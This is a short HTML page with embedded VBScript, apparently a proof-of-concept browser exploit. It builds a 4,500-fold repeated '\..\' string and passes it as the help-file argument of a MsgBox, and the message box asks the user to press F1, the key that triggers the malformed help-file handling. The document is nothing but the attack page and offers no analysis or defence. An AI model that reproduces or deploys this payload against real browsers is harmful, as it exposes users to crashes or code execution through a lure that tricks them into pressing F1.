<html> <script type="text/vbscript"> big = "aaaa" For i=1 to 4500 big = big & "\..\" Next MsgBox "please press F1 to save the world", ,"please save the world", big, 1 </script> </html>